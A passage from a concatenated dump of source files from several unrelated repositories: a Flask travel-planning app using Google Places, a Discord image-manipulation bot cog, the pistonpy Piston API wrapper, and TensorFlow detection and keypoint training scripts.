"https://maps.googleapis.com/maps/api/place/textsearch/json?query={locationstr}&key={APIKEY}".format(locationstr = locationstr, APIKEY = APIKEY) print(url) response = requests.get(url) res = json.loads(response.text) return (res["results"]) def getPlacesID(locationstr): locationstr = locationstr.replace(' ','%20' ) url = "https://maps.googleapis.com/maps/api/place/findplacefromtext/json?input={locationstr}&inputtype=textquery&fields=formatted_address,name,rating,place_id&locationbias=circle:[email protected],151.0281859&key={APIKEY}".format(locationstr = locationstr, APIKEY = APIKEY) print(url) response = requests.get(url) res = json.loads(response.text) print(res["candidates"][0]["place_id"]) return (res) def getPhotoRecs(locations): lst = [] k = 0 for pn in locations: k = k + 1 if k == 1: continue if k == 10: break d = {} refID =pn["photos"][0]["photo_reference"] name = pn["name"] print(name) width = 1000 url = "https://maps.googleapis.com/maps/api/place/photo?maxwidth={width}&photoreference={refID}&key={APIKEY}".format(width = width, refID = refID, APIKEY = APIKEY) d['src'] = url d['name'] = name lst.append(d) print(lst) return json.dumps(lst) #print(getCurrentLocation()) #findRestaurant(getCurrentLocation()) #Places.findPointsOfInterest() #locations = Places.findPointsOfInterest() #Places.getPhotoRecs(locations) #print(location["photos"][0]["photo_reference"]) #id = getPhotoId(findPointsOfInterest()) #getPhotoLocation(id) #info = Places.getPlacesInfo("Darling Harbour") #Places.getPhoto(info) Places.getPlacesID("Broken Hill") ``` #### File: SENG2021-Geographically/code/run.py ```python from flask import Flask, render_template from flask_restful import reqparse, abort, Api, Resource from flask_cors import CORS from resources.Places import * from resources.Routing import * from resources.parse import * from resources.Weather import * from resources.Music import * from resources.Playlist import * from pymongo import MongoClient ### Import resources from resources.users import Users ### Set up/connect to the Mongo Database client = MongoClient("mongodb://localhost:27017/") db = client.geographicallyDB users = db.users ### Set 'flask' environment settings app = Flask(__name__) api = Api(app) app.config.from_object(__name__) # enable CORS CORS(app) route = [ { 'start': Places.getCurrentLocation(), 'startID': Places.getCurrentLocation(), 'end': "Canberra", 'endID': Places.getPlacesID("Canberra")["candidates"][0]["place_id"] } ] #we should get a json returning from the other functions and call it from here recommendations = Places.findPointsOfInterest() locationphotos = Places.getPhotoRecs(recommendations) print(locationphotos) locations = json.loads(locationphotos) #print(findRoute) class Recommendations(Resource): def get(self): return locations class Routing(Resource): def get(self): print("dist") print(route) if not route[0]['start']: print(Places.getCurrentLocation()) findRoute = Route.findRouteInfo(Places.getCurrentLocation(), route[0]['endID']) else: print("start id") print(route[0]['startID']) findRoute = Route.findRouteInfo(route[0]['startID'], route[0]['endID']) return jsonify(findRoute) def put(self,start,end): findRoute = Route.findRouteInfo(start, end) return findRoute class LocSummary(Resource): def get(self): summary = Summary.getPlaceSummary(route[0]['end']) return summary class DestinationPhoto(Resource): def get(self): location = route[0]['end'] print(location) info = Places.getPlacesInfo(location) print(info) return Places.getPhoto(info) class CurrentLocation(Resource): def get(self): lat,lng = Places.getCurrentLocation() print(lat) print(lng) return jsonify( { 'lat': lat, 'lng': lng }) class Location(Resource): def get(self): print('hi') print(route) return jsonify({ 'status': 'success', 'location': route }) def post(self): location = {'start':'help', 'dest' : 'end'} location = request.get_json() route[0]['start'] = location['start'] route[0]['end'] = location['end'] print("LOCATION") print(route[0]['end']) if route[0]['start']: route[0]['startID'] = Places.getPlacesID(location['start'])["candidates"][0]["place_id"] route[0]['endID'] = Places.getPlacesID(location['end'])["candidates"][0]["place_id"] print(route[0]['endID']) summary = Summary.getPlaceSummary(location["end"]) print(summary) return location class LocWeather(Resource): def get(self): locationID = Weather.getLocationID(route[0]['end'])[0]["id"] weather = Weather.getWeather(locationID) return weather class Spotify(Resource): def get(self): music = Music.searchPlaylist(route[0]['end']) print(music) return music class genPlaylist(Resource): def get(self): locationID = Weather.getLocationID(route[0]['end'])[0]["id"] weather = Weather.getWeather(locationID) print(locationID) Playlist.createPlaylist(weather["forecasts"]["weather"]["days"][0]["entries"][0]["precis"], route[0]['end']) return weather api.add_resource(Recommendations, '/recommendation') api.add_resource(Routing, '/trips') api.add_resource(LocSummary, '/trips/summary') api.add_resource(DestinationPhoto, '/trips/photo') api.add_resource(Location, '/location') api.add_resource(CurrentLocation, '/current') api.add_resource(LocWeather, '/trips/weather') api.add_resource(Spotify, '/trips/music') api.add_resource(genPlaylist, '/trips/genplaylists') @app.route('/') def test_page(): return Recommendations @app.route('/location') def sendInfo(): print("test") details = request.get_json() print(details["end"]) summary = Summary.getPlaceSummary("Canberra") print(details) print(summary) return jsonify(details) ### Add the Flask_RESTful resources here api.add_resource(Users, '/Users') ### Start the server, (called through 'serverStart' script) if __name__ == '__main__': app.run() ```
{ "source": "AaalbatrossGuy/DeltaDiscordBot", "score": 3 }
#### File: DeltaDiscordBot/Cogs/Image_manipulation.py ```python import discord import requests from discord.ext import commands from io import BytesIO from PIL import Image, ImageOps, ImageFilter from asyncdagpi import Client, ImageFeatures class ImageManipulation(commands.Cog): def __init__(self, client): self.client = client self.dagpi = Client("<KEY>") @commands.command(name="bw_u") async def black_and_white_user(self, ctx, *, member: discord.Member = None): member = member or ctx.message.author avatar_url = member.avatar_url_as(format='jpeg') image = Image.open(requests.get(url=avatar_url, stream=True).raw).convert("L") with BytesIO() as image_bytes: image.save(image_bytes, 'jpeg') image_bytes.seek(0) await ctx.channel.send( file=discord.File(fp=image_bytes, filename="image.jpeg")) @commands.command(name="negative_u") async def negative_user(self, ctx, *, member: discord.Member = None): member = member or ctx.message.author avatar_url = member.avatar_url_as(format='jpeg') image = Image.open(requests.get(url=avatar_url, stream=True).raw) image_inverted = ImageOps.invert(image) with BytesIO() as image_bytes: image_inverted.save(image_bytes, 'jpeg') image_bytes.seek(0) await ctx.channel.send( file=discord.File(fp=image_bytes, filename="image.jpeg")) @commands.command(name="blur_u") async def blur_user(self, ctx, radius: int, *, member: discord.Member = None): member = member or ctx.message.author avatar_url = member.avatar_url_as(format='jpeg') image = Image.open(requests.get(url=avatar_url, stream=True).raw) blurred_image = image.filter(ImageFilter.GaussianBlur(radius=int(radius))) with BytesIO() as image_bytes: blurred_image.save(image_bytes, 'jpeg') image_bytes.seek(0) await ctx.channel.send( file=discord.File(fp=image_bytes, filename="image.jpeg")) @commands.command(name="bw_f") async def black_and_white_file(self, ctx): image = ctx.message.attachments[0].url main_image = Image.open(requests.get(url=image, stream=True).raw).convert("L") with BytesIO() as image_bytes: main_image.save(image_bytes, 'jpeg') image_bytes.seek(0) await ctx.channel.send( file=discord.File(fp=image_bytes, filename="image.jpeg")) @commands.command(name="negative_f") async def negative_file(self, ctx): image = ctx.message.attachments[0].url image = Image.open(requests.get(url=image, stream=True).raw).convert("RGB") main_image = ImageOps.invert(image) with BytesIO() as image_bytes: main_image.save(image_bytes, 'jpeg') image_bytes.seek(0) await ctx.channel.send( file=discord.File(fp=image_bytes, filename="image.jpeg")) @commands.command(name="blur_f") async def blur_file(self, ctx, radius: int): image = ctx.message.attachments[0].url image = Image.open(requests.get(url=image, stream=True).raw) main_image = image.filter(ImageFilter.GaussianBlur(radius=int(radius))) with BytesIO() as image_bytes: main_image.save(image_bytes, 'png') image_bytes.seek(0) await ctx.channel.send( file=discord.File(fp=image_bytes, filename="image.png")) @commands.command() async def wasted(self, ctx, *, member:discord.Member = None): member = member or ctx.message.author url = member.avatar_url_as(format="png") base_url = f"https://some-random-api.ml/canvas/wasted?avatar={url}" await ctx.channel.send(base_url) @commands.command() async def trigger(self, ctx, *, member:discord.Member = None): member = member or ctx.message.author url= member.avatar_url_as(format="png") img = await self.dagpi.image_process(ImageFeatures.triggered(), str(url)) file = discord.File(fp=img.image, filename=f"triggered.{img.format}") await ctx.channel.send(file=file) @commands.command() async def magic(self, ctx, *, member:discord.Member = None): member = member or ctx.message.author url = member.avatar_url_as(format="png") img = await self.dagpi.image_process(ImageFeatures.magik(), str(url)) file = discord.File(fp=img.image, filename=f"magic.{img.format}") await ctx.channel.send(file=file) @commands.command() async def pixel(self, ctx, *, member:discord.Member = None): member = member or ctx.message.author url = member.avatar_url_as(format="png") img = await self.dagpi.image_process(ImageFeatures.pixel(), str(url)) file = discord.File(fp=img.image, filename=f'pixel.{img.format}') await ctx.channel.send(file=file) @commands.command() async def angel(self, ctx, *, member:discord.Member = None): member = member or ctx.message.author url = member.avatar_url_as(format="png") img = await self.dagpi.image_process(ImageFeatures.angel(), str(url)) file = discord.File(fp=img.image, filename=f"angel.{img.format}") await ctx.channel.send(file=file) @commands.command() async def devil(self, ctx, *, member:discord.Member = None): member = member or ctx.message.author url = member.avatar_url_as(format="png") img = await self.dagpi.image_process(ImageFeatures.satan(), str(url)) file = discord.File(fp=img.image, filename=f"devil.{img.format}") await ctx.channel.send(file=file) @commands.command() async def windel(self, ctx, *, member:discord.Member = None): member = member or ctx.message.author url = member.avatar_url_as(format="png") img = await self.dagpi.image_process(ImageFeatures.delete(), str(url)) file = discord.File(fp=img.image, filename=f'delete.{img.format}') await ctx.channel.send(file=file) @commands.command() async def hitler(self, ctx, *, member:discord.Member = None): member = member or ctx.message.author url = member.avatar_url_as(format="png") img = await self.dagpi.image_process(ImageFeatures.hitler(), str(url)) file = discord.File(fp=img.image, filename=f'hitler.{img.format}') await ctx.channel.send(file=file) @commands.command() async def stringify(self, ctx, *, member:discord.Member = None): member = member or ctx.message.author url = member.avatar_url_as(format="png") img = await self.dagpi.image_process(ImageFeatures.stringify(), str(url)) file = discord.File(fp=img.image, filename = f"stringify.{img.format}") await ctx.channel.send(file=file) #Error Handlers @black_and_white_user.error async def bw_user_error_handling(self, ctx, error): if isinstance(error, commands.MemberNotFound): await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Member Not Found", description="```ini\nMake sure you have run the command providing the [username]```", timestamp=ctx.message.created_at, color=discord.Color.dark_red())) @negative_user.error async def negative_u_error_handling(self, ctx, error): if isinstance(error, commands.MemberNotFound): await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Member Not Found", description="```ini\nMake sure you have run the command providing the [username]```", timestamp=ctx.message.created_at, color=discord.Color.dark_red())) @blur_user.error async def blur_u_error_handling(self, ctx, error): if isinstance(error, commands.MemberNotFound): await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Member Not Found", description="```ini\nMake sure you have run the command providing the [username]```", timestamp=ctx.message.created_at, color=discord.Color.dark_red())) if isinstance(error, commands.MissingRequiredArgument): await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Arguments", description="```ini\nMake sure you have run the command providing the [blur radius] and the [username]```", timestamp=ctx.message.created_at, color=discord.Color.dark_teal())) @black_and_white_file.error async def bw_f_error_handling(self, ctx, error): if isinstance(error, commands.CommandInvokeError): await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Attachment", description="```prolog\nMake sure you have run the command providing the File/Image as an Attachment```", timestamp=ctx.message.created_at, color=discord.Color.dark_teal())) @negative_file.error async def negative_f_error_handling(self, ctx, error): if isinstance(error, commands.CommandInvokeError): await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Attachment", description="```prolog\nMake sure you have run the command providing the File/Image as an Attachment```", timestamp=ctx.message.created_at, color=discord.Color.dark_teal())) @blur_file.error async def blur_f_error_handling(self, ctx, error): if isinstance(error, commands.CommandInvokeError): await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Attachment", description="```prolog\nMake sure you have run the command providing the File/Image as an Attachment```", timestamp=ctx.message.created_at, color=discord.Color.dark_teal())) @wasted.error async def wasted_error_handling(self, ctx, error): if isinstance(error, commands.MemberNotFound): await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Member Not Found", description="```ini\nMake sure you have run the command providing the [username]```", timestamp=ctx.message.created_at, color=discord.Color.dark_red())) @trigger.error async def trigger_error_handling(self, ctx, error): if isinstance(error, commands.MemberNotFound): await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Member Not Found", description="```ini\nMake sure you have run the command providing the [username]```", timestamp=ctx.message.created_at, color=discord.Color.dark_red())) @magic.error async def magic_error_handling(self, ctx, error): if isinstance(error, commands.MemberNotFound): await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Member Not Found", description="```ini\nMake sure you have run the command providing the [username]```", timestamp=ctx.message.created_at, color=discord.Color.dark_red())) @pixel.error async def pixel_error_handling(self, ctx, error): if isinstance(error, commands.MemberNotFound): await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Member Not Found", description="```ini\nMake sure you have run the command providing the [username]```", timestamp=ctx.message.created_at, color=discord.Color.dark_red())) @angel.error async def angel_error_handling(self, ctx, error): if isinstance(error, commands.MemberNotFound): await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Member Not Found", description="```ini\nMake sure you have run the command providing the [username]```", timestamp=ctx.message.created_at, color=discord.Color.dark_red())) @devil.error async def devil_error_handling(self, ctx, error): if isinstance(error, commands.MemberNotFound): await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Member Not Found", description="```ini\nMake sure you have run the command providing the [username]```", timestamp=ctx.message.created_at, color=discord.Color.dark_red())) @windel.error async def windel_error_handling(self, ctx, error): if isinstance(error, commands.MemberNotFound): await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Member Not Found", description="```ini\nMake sure you have run the command providing the [username]```", timestamp=ctx.message.created_at, color=discord.Color.dark_red())) @hitler.error async def hitler_error_handling(self, ctx, error): if isinstance(error, commands.MemberNotFound): await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Member Not Found", description="```ini\nMake sure you have run the command providing the [username]```", timestamp=ctx.message.created_at, color=discord.Color.dark_red())) @stringify.error async def stringify_error_handling(self, ctx, error): if isinstance(error, commands.MemberNotFound): await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Member Not Found", description="```ini\nMake sure you have run the command providing the [username]```", timestamp=ctx.message.created_at, color=discord.Color.dark_red())) def setup(client): client.add_cog(ImageManipulation(client)) ``` #### File: DeltaDiscordBot/lib/db.py ```python from os.path import isfile from sqlite3 import connect db_path = "./Data/database.db" buildpath = "./Data/build.sql" connectdb = connect(db_path, check_same_thread=False) cursor = connectdb.cursor() def with_commit(func): def inner(*args, **kwargs): func(*args, **kwargs) commit() return inner @with_commit def build(): if isfile(buildpath): scriptexec(buildpath) def commit(): connectdb.commit() def closedb(): connectdb.close() def field(command, *values): cursor.execute(command, tuple(values)) if (fetch := cursor.fetchone()) is not None: return fetch[0] def record(command, *values): cursor.execute(command, tuple(values)) return cursor.fetchone() def records(command, *values): cursor.execute(command, tuple(values)) return cursor.fetchall() def column(command, *values): cursor.execute(command, tuple(values)) return [item[0] for item in cursor.fetchall()] def execute(command, *values): cursor.execute(command, tuple(values)) def multiexec(command, value_s): cursor.executemany(command, value_s) def scriptexec(path): with open(path, "r", encoding="utf-8") as file: cursor.executescript(file.read()) ```
{ "source": "AaalbatrossGuy/pistonpy", "score": 2 }
#### File: src/pistonpy/models.py ```python import requests, json from .exceptions import PistonError, MultipleLanguagesFound from .extensions import lang_extensions as le __all__ = ("GetOutput", "Extensions",) class GetOutput: def __init__(self, payload: dict) -> None: self._endpoint = "https://emkc.org/api/v2/piston/execute" self.payload = payload def parse_output(self): output = requests.request("POST", url=self._endpoint, data = json.dumps(self.payload)) output = output.json() if output.get('message'): raise PistonError(output.get('message')) else: return output class Extensions: def __init__(self, language: str, payload: list) -> None: self.payload = payload self.language = language @property def check_files(self): check_bool = [] file_extensions = [i.split('.')[1] for i in self.payload] for file in file_extensions: check_bool.append(True) if file in le[self.language] and file == le[self.language] else check_bool.append(False) #print(check_bool) if all(check_bool): return True, None else: return False, file_extensions ``` #### File: src/pistonpy/pistonapp.py ```python import requests, json from typing import Optional from .exceptions import CodeNotFound, LanguageNotFound, CodeFormatNotFound, NotAFile, MultipleLanguagesFound from .models import GetOutput, Extensions __all__ = ('PistonApp',) class PistonApp(): """The class to use while working with other code or creating applications or discord bots.""" def __init__(self, embed: str = 'app') -> None: """ :param embed: app - work as integrated. Default is set to app """ self.embed = embed self._endpoint = "https://emkc.org/api/v2/piston" def __repr__(self) -> str: return "<pistonpy.PistonApp>" @property def raw(self) -> dict: url = self._endpoint + "/runtimes" response = requests.request("GET", url) data = response.json() return data @property def languages(self) -> dict: url = self._endpoint + "/runtimes" response = requests.request("GET", url) data = response.json() language = [] version = [] for i in data: language.append(i['language']) version.append(i['version']) dic = dict(zip(language, version)) return dic @property def aliases(self) -> dict: url = self._endpoint + "/runtimes" response = requests.request("GET", url) data = response.json() language = [] alias = [] for i in data: language.append(i['language']) alias.append(i['aliases']) dic = dict(zip(language, alias)) return dic def run( self, language: str, version: str = "*", files: Optional[list] = [], code: Optional[str] = "", args: Optional[list] = [], input: Optional[str] = "", compile_timeout: Optional[int] = 10_000, run_timeout: Optional[int] = 3_000, compile_memory_limit: Optional[int] = -1, run_memory_limit: Optional[int] = -1, ) -> list: """Main Code Execution""" main_code = '' formattedfiles = [i.split('.')[0] for i in files] file_extensions = [i.split('.')[1] for i in files] bool, message = Extensions(language=language, payload=files).check_files if files: if bool: pass else: raise MultipleLanguagesFound(f"Files of multiple languages found: {message}") if not code and not files: print('running CodeNotFound') raise CodeNotFound("No code provided to run") elif code and files: print('running CodeFormatNotFound') raise CodeFormatNotFound("Cannot choose whether to run raw code or code from file/s") else: if code: main_code = [{"name" : '', "content" : code}] if files and len(files) == 1: files_content = [] for file in files: try: with open(file, mode="r") as f: content = f.read() files_content.append({"name": file, "content": content}) except FileNotFoundError: raise FileNotFoundError(f"{file} not found.") main_code = files_content if files and 1 < len(files) < 5 and 'py' in file_extensions: files_content = [] for file in files: files_content.append({"name" : "main.py", "content" : f"import {', '.join(formattedfiles)}"}) try: with open(file, mode="r") as f: content = f.read() files_content.append({"name" : file, "content" : content}) except FileNotFoundError: raise FileNotFoundError(f"{file} not found.") main_code = files_content # print(f"main_code = {main_code}") if files and 1 < len(files) <= 5: files_content = [] response = [] for file in files: try: with open(file, mode="r") as f: content = f.read() files_content.append({"name" : file, "content" : content}) except FileNotFoundError: raise FileNotFoundError(f"{file} not found.") for data in files_content: temp = [] temp.append(json.dumps(data)) multiple_files = { 'language' : language, 'version' : version, 'files' : json.dumps(temp), 'args' : args, 'stdin' : input, 'compile_timeout' : compile_timeout, 'run_timeout' : run_timeout, 'compile_memory_limit' : compile_memory_limit, 'run_memory_limit' : run_memory_limit } print(f"Multiple Files - {multiple_files}") response.append(GetOutput(multiple_files).parse_output()) return response payload = { 'language' : language, 'version' : version, 'files' : main_code, 'args' : args, 'stdin' : input, 'compile_timeout' : compile_timeout, 'run_timeout' : run_timeout, 'compile_memory_limit' : compile_memory_limit, 'run_memory_limit' : run_memory_limit } return GetOutput(payload).parse_output() ```
{ "source": "aaalgo/aardvark", "score": 3 }
#### File: aardvark/mura/import14.py ```python import os import picpac PARTS = { 'XR_ELBOW': 0, 'XR_FINGER': 1, 'XR_FOREARM': 2, 'XR_HAND': 3, 'XR_HUMERUS': 4, 'XR_SHOULDER': 5, 'XR_WRIST': 6 } def load_file (path): with open(path, 'rb') as f: return f.read() def import_db (db_path, list_path): db = picpac.Writer(db_path, picpac.OVERWRITE) with open(list_path, 'r') as f: for l in f: path = l.strip() part = path.split('/')[2] #print(path) if 'positive' in path: l = 1 elif 'negative' in path: l = 0 else: assert 0 pass assert part in PARTS k = PARTS[part] label = k * 2 + l db.append(label, load_file('data/' + path), path.encode('ascii')) pass pass #import_db('scratch/train.db', 'train.list') #import_db('scratch/val.db', 'val.list') import_db('scratch/val0.db', 'val0.list') ``` #### File: aaalgo/aardvark/predict-rpn.py ```python import os import sys os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' import time from tqdm import tqdm import numpy as np import cv2 from skimage import measure # RESNET: import these for slim version of resnet import tensorflow as tf from tensorflow.python.framework import meta_graph class Model: def __init__ (self, X, anchor_th, nms_max, nms_th, is_training, path, name): mg = meta_graph.read_meta_graph_file(path + '.meta') self.predictions = tf.import_graph_def(mg.graph_def, name=name, input_map={'images:0': X, 'anchor_th:0': anchor_th, 'nms_max:0': nms_max, 'nms_th:0': nms_th, 'is_training:0': is_training, }, return_elements=['rpn_probs:0', 'rpn_shapes:0', 'rpn_index:0']) self.saver = tf.train.Saver(saver_def=mg.saver_def, name=name) self.loader = lambda sess: self.saver.restore(sess, path) pass pass flags = tf.app.flags FLAGS = flags.FLAGS flags.DEFINE_string('model', None, '') flags.DEFINE_string('input', None, '') flags.DEFINE_string('input_db', None, '') flags.DEFINE_integer('stride', 16, '') flags.DEFINE_float('anchor_th', 0.5, '') flags.DEFINE_integer('nms_max', 10000, '') flags.DEFINE_float('nms_th', 0.2, '') flags.DEFINE_float('max', None, 'max images from db') def save_prediction_image (path, image, preds): image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR) rpn_probs, rpn_boxes, rpn_index = preds assert np.all(rpn_index == 0) rpn_boxes = np.round(rpn_boxes).astype(np.int32) for i in range(rpn_boxes.shape[0]): x1, y1, x2, y2 = rpn_boxes[i] cv2.rectangle(image, (x1, y1), (x2, y2), (0, 0, 255)) #boxes = np.round(boxes).astype(np.int32) #for i in range(boxes.shape[0]): # x1, y1, x2, y2 = boxes[i] # cv2.rectangle(image, (x1, y1), (x2, y2), (0, 255, 0)) cv2.imwrite(path, image) pass def main (_): X = tf.placeholder(tf.float32, shape=(None, None, None, 3), name="images") is_training = tf.constant(False, name="is_training") anchor_th = tf.constant(FLAGS.anchor_th, tf.float32) nms_max = tf.constant(FLAGS.nms_max, tf.int32) nms_th = tf.constant(FLAGS.nms_th, tf.float32) model = Model(X, anchor_th, nms_max, nms_th, is_training, FLAGS.model, 'xxx') config = tf.ConfigProto() config.gpu_options.allow_growth=True with tf.Session(config=config) as sess: model.loader(sess) if FLAGS.input: assert os.path.exists(FLAGS.input) image = cv2.imread(FLAGS.input, cv2.IMREAD_COLOR) image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) batch = np.expand_dims(image, axis=0).astype(dtype=np.float32) preds = sess.run(model.predictions, feed_dict={X: batch}) save_prediction_image(FLAGS.input + '.prob.png', image, preds) if FLAGS.input_db: assert os.path.exists(FLAGS.input_db) import picpac from gallery import Gallery picpac_config = {"db": FLAGS.input_db, "loop": False, "shuffle": False, "reshuffle": False, "annotate": False, "channels": 3, "stratify": False, "dtype": "float32", "colorspace": "RGB", "batch": 1, "transforms": [] } stream = picpac.ImageStream(picpac_config) gal = Gallery('output') C = 0 for _, images in stream: preds = sess.run(model.predictions, feed_dict={X: images, is_training: False}) save_prediction_image(gal.next(), images[0], preds) C += 1 if FLAGS.max and C >= FLAGS.max: break pass pass gal.flush() pass if __name__ == '__main__': tf.app.run() ``` #### File: aaalgo/aardvark/rpn3d.py ```python import os import math import sys from abc import abstractmethod import numpy as np import tensorflow as tf import tensorflow.contrib.slim as slim from nets import nets_factory, resnet_utils import aardvark import cv2 from tf_utils import * import cpp flags = tf.app.flags FLAGS = flags.FLAGS flags.DEFINE_string('rpn_priors', 'rpn_priors', 'param prior config file') flags.DEFINE_integer('rpn_params', 3, 'number of parameters per shape') flags.DEFINE_integer('rpn_stride', 1, 'downsize factor of rpn output') flags.DEFINE_float('rpn_logits_weight', 1.0, 'loss weight') flags.DEFINE_float('rpn_params_weight', 1.0, 'loss weight') class BasicRPN3D: def __init__ (self): priors = [] # read in priors # what RPN estimates is the delta between priors and the real # regression target. if os.path.exists(FLAGS.rpn_priors): with open(FLAGS.rpn_priors, 'r') as f: for l in f: if l[0] == '#': continue vs = [float(v) for v in l.strip().split(' ')] assert len(vs) == FLAGS.rpn_params priors.append(vs) pass pass pass if len(priors) == 0: priors.append([1.0] * FLAGS.rpn_params) pass aardvark.print_red("PRIORS %s" % str(priors)) self.priors = np.array(priors, dtype=np.float32) pass def rpn_backbone (self, volume, is_training, stride): assert False def rpn_logits (self, net, is_training, channels): assert False def rpn_params (self, net, is_training, channels): assert False def rpn_generate_shapes (self, shape, anchor_params, priors, n_priors): assert False def build_rpn (self, volume, is_training, shape=None): # volume: input volume tensor Z,Y,X = shape assert max(Z % FLAGS.rpn_stride, Y % FLAGS.rpn_stride, X % FLAGS.rpn_stride) == 0 oZ = Z // FLAGS.rpn_stride oY = Y // FLAGS.rpn_stride oX = X // FLAGS.rpn_stride n_priors = self.priors.shape[0] n_params = self.priors.shape[1] self.gt_anchors = tf.placeholder(tf.float32, shape=(None, oZ, oY, oX, n_priors)) self.gt_anchors_weight = tf.placeholder(tf.float32, shape=(None, oZ, oY, oX, n_priors)) # parameter of that location self.gt_params = tf.placeholder(tf.float32, shape=(None, oZ, oY, oX, n_priors, n_params)) self.gt_params_weight = tf.placeholder(tf.float32, shape=(None, oZ, oY, oX, n_priors)) self.backbone = self.rpn_backbone(volume, is_training, FLAGS.rpn_stride) logits = self.rpn_logits(self.backbone, is_training, n_priors) logits = tf.identity(logits, name='logits') self.logits = logits self.probs = tf.sigmoid(logits, name='probs') params = self.rpn_params(self.backbone, is_training, n_priors * n_params) params = tf.identity(params, name='params') self.params = params # setup losses # 1. losses for logits logits1 = tf.reshape(logits, (-1,)) gt_anchors = tf.reshape(self.gt_anchors, (-1,)) gt_anchors_weight = tf.reshape(self.gt_anchors_weight, (-1,)) xe = tf.nn.sigmoid_cross_entropy_with_logits(logits=logits1, labels=tf.cast(gt_anchors, tf.float32)) xe = tf.reduce_sum(xe * gt_anchors_weight) / (tf.reduce_sum(gt_anchors_weight) + 0.00001) xe = tf.identity(xe, name='xe') getattr(self, 'metrics', []).append(xe) tf.losses.add_loss(xe * FLAGS.rpn_logits_weight) # 2. losses for parameters priors = tf.constant(self.priors[np.newaxis, :, :], dtype=tf.float32) params = tf.reshape(params, (-1, n_priors, n_params)) gt_params = tf.reshape(self.gt_params, (-1, n_priors, n_params)) l1 = tf.losses.huber_loss(params, gt_params / priors, reduction=tf.losses.Reduction.NONE, loss_collection=None) l1 = tf.reduce_sum(l1, axis=2) # l1: ? * n_priors l1 = tf.reshape(l1, (-1,)) gt_params_weight = tf.reshape(self.gt_params_weight, (-1,)) l1 = tf.reduce_sum(l1 * gt_params_weight) / (tf.reduce_sum(gt_params_weight) + 0.00001) l1 = tf.identity(l1, name='l1') getattr(self, 'metrics', []).append(l1) tf.losses.add_loss(l1 * FLAGS.rpn_params_weight) pass ``` #### File: aaalgo/aardvark/train-basic-keypoints.py ```python import os import sys sys.path.append(os.path.join(os.path.abspath(os.path.dirname(__file__)), 'zoo/slim')) import logging import numpy as np import tensorflow as tf import tensorflow.contrib.slim as slim import aardvark from tf_utils import * flags = tf.app.flags FLAGS = flags.FLAGS flags.DEFINE_string('finetune', None, '') flags.DEFINE_string('backbone', 'resnet_v2_50', 'architecture') flags.DEFINE_integer('backbone_stride', 16, '') flags.DEFINE_integer('feature_channels', 64, '') flags.DEFINE_integer('stride', 4, '') flags.DEFINE_integer('radius', 25, '') flags.DEFINE_float('offset_weight', 1, '') PIXEL_MEANS = tf.constant([[[[103.94, 116.78, 123.68]]]]) # VGG PIXEL MEANS USED BY TF def params_loss (dxy, dxy_gt): l1 = tf.losses.huber_loss(dxy, dxy_gt, reduction=tf.losses.Reduction.NONE, loss_collection=None) return tf.reduce_sum(l1, axis=1) class Model (aardvark.Model): def __init__ (self): super().__init__() if FLAGS.classes > 1: aardvark.print_red("Classes should be number of point classes,") aardvark.print_red("not counting background. Usually 1.") pass def extra_stream_config (self, is_training): augments = aardvark.load_augments(is_training) shift = 0 if is_training: shift = FLAGS.clip_shift return { "annotate": [1], "transforms": [{"type": "resize", "max_size": FLAGS.max_size} ] + augments + [ {"type": "clip", "shift": shift, "width": FLAGS.fix_width, "height": FLAGS.fix_height, "round": FLAGS.clip_stride}, {"type": "keypoints.basic", 'downsize': FLAGS.stride, 'classes': FLAGS.classes, 'radius': FLAGS.radius}, #{"type": "anchors.dense.point", 'downsize': FLAGS.stride, 'lower_th': anchor_th, 'upper_th': anchor_th}, {"type": "drop"}, # remove original annotation ] } def feed_dict (self, record, is_training = True): _, images, _, mask, offsets = record return {self.is_training: is_training, self.images: images, self.mask: mask, self.gt_offsets: offsets} def build_graph (self): if True: # setup inputs # parameters is_training = tf.placeholder(tf.bool, name="is_training") images = tf.placeholder(tf.float32, shape=(None, None, None, FLAGS.channels), name="images") # the reset are for training only mask = tf.placeholder(tf.float32, shape=(None, None, None, FLAGS.classes)) gt_offsets = tf.placeholder(tf.float32, shape=(None, None, None, FLAGS.classes*2)) self.is_training = is_training self.images = images self.mask = mask self.gt_offsets = gt_offsets backbone = aardvark.create_stock_slim_network(FLAGS.backbone, images, is_training, global_pool=False, stride=FLAGS.backbone_stride) with tf.variable_scope('head'), slim.arg_scope(aardvark.default_argscope(is_training)): if FLAGS.finetune: backbone = tf.stop_gradient(backbone) #net = slim_multistep_upscale(net, FLAGS.backbone_stride / FLAGS.stride, FLAGS.reduction) #backbone = net stride = FLAGS.backbone_stride // FLAGS.stride #backbone = slim.conv2d_transpose(backbone, FLAGS.feature_channels, st*2, st) #prob = slim.conv2d(backbone, FLAGS.classes, 3, 1, activation_fn=tf.sigmoid) prob = slim.conv2d_transpose(backbone, FLAGS.classes, stride*2, stride, activation_fn=tf.sigmoid) #logits2 = tf.reshape(logits, (-1, 2)) #prob2 = tf.squeeze(tf.slice(tf.nn.softmax(logits2), [0, 1], [-1, 1]), 1) #tf.reshape(prob2, tf.shape(mask), name='prob') #xe = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits2, labels=mask) dice = tf.identity(dice_loss(mask, prob), name='di') tf.losses.add_loss(dice) self.metrics.append(dice) offsets = slim.conv2d_transpose(backbone, FLAGS.classes*2, stride*2, stride, activation_fn=None) offsets2 = tf.reshape(offsets, (-1, 2)) # ? * 4 gt_offsets2 = tf.reshape(gt_offsets, (-1,2)) mask2 = tf.reshape(mask, (-1,)) pl = 